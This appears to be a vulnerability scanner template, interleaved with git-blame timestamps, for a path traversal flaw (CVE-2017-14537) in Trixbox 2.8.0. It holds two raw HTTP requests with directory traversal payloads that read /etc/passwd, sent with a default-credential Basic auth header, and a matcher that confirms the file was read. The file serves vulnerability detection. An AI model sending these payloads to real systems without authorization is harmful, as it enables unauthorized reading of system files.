2021-01-02 05:02:50 +00:00
id : CVE-2017-14537
2020-09-04 04:26:20 +00:00
info :
2022-04-07 13:53:15 +00:00
name : Trixbox 2.8.0 Path Traversal
2020-09-04 04:26:20 +00:00
author : pikpikcu
severity : medium
2022-04-07 13:53:15 +00:00
description : "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
2022-02-21 18:33:16 +00:00
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.50
cve-id : CVE-2017-14537
cwe-id : CWE-22
2022-04-07 13:53:15 +00:00
tags : cve,cve2017,trixbox,lfi
2020-09-04 04:26:20 +00:00
requests :
- raw :
- |
POST /maint/index.php?packages HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : {{Hostname}}/maint/index.php?packages
Cookie : lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization : Basic bWFpbnQ6cGFzc3dvcmQ=
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
- |
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Referer : {{Hostname}}/maint/index.php?packages
Cookie : lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization : Basic bWFpbnQ6cGFzc3dvcmQ=
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-09-08 12:17:19 +00:00
2020-09-04 04:26:20 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-09-04 04:26:20 +00:00
part : body
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/01